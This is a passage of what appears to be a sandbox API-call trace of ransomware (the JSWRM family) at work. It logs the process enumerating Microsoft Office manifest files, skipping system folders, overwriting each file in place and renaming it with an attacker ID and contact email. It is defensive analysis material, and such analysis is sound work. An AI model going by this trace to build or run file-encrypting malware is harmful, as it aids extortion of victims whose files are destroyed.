Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0072.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.060] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP51DE~1.XML")) returned 1 [0072.060] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.061] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.061] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.061] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.061] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.061] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.061] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.061] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.061] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.061] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0072.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0072.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0072.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0072.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0072.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.061] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.062] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.062] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.099] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.099] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.099] CloseHandle (hObject=0x458) returned 1 [0072.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0072.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0072.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.099] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.100] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83485006, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83485006, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x79381, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", cAlternateFileName="APPXMA~4.XML")) returned 1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.100] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0072.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0072.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0072.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0072.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0072.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.102] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=496513) returned 1 [0072.102] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.102] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.116] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.116] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.117] CloseHandle (hObject=0x458) returned 1 [0072.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0072.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0072.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.118] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.118] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ecd099, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", cAlternateFileName="APCEE5~1.XML")) returned 1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.118] lstrcmpiW (lpString1="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0072.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0072.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0072.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.119] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.119] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.119] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.121] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.121] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.121] CloseHandle (hObject=0x458) returned 1 [0072.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0072.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 